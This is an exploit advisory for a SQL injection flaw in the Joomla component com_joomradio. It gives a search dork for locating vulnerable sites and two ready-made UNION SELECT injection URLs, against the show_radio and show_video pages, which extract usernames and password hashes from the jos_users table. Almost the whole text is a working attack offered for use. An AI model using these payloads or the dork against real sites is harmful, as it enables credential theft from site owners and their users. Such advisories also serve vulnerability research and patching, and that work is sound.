######################################################### # # # Joomla Component joomradio Remote SQL Injection # # # ######################################################### ######################################## [*] Founded by : His0k4 (Algerian HaCkeR); [*] Contact: His0k4.hlm[at]gmail.com [*] Greetz : All friends & muslims HaCkeRs :) [*] Greetz2 : http://www.palcastle.org/cc/ ######################################## [*] Script_Name: "Joomla" [*] Component_Name: "com_joomradio" ######################################## [*] DORK: inurl:com_joomradio ######################################## [*] P.O.C 1: /index.php?option=com_joomradio&page=show_radio&id={SQL} [*] Example: /index.php?option=com_joomradio&page=show_radio&id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user() FROM jos_users-- [*] P.O.C 2: /index.php?option=com_joomradio&page=show_video&id={SQL} [*] Example: /index.php?option=com_joomradio&page=show_video&id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user() FROM jos_users-- ########################################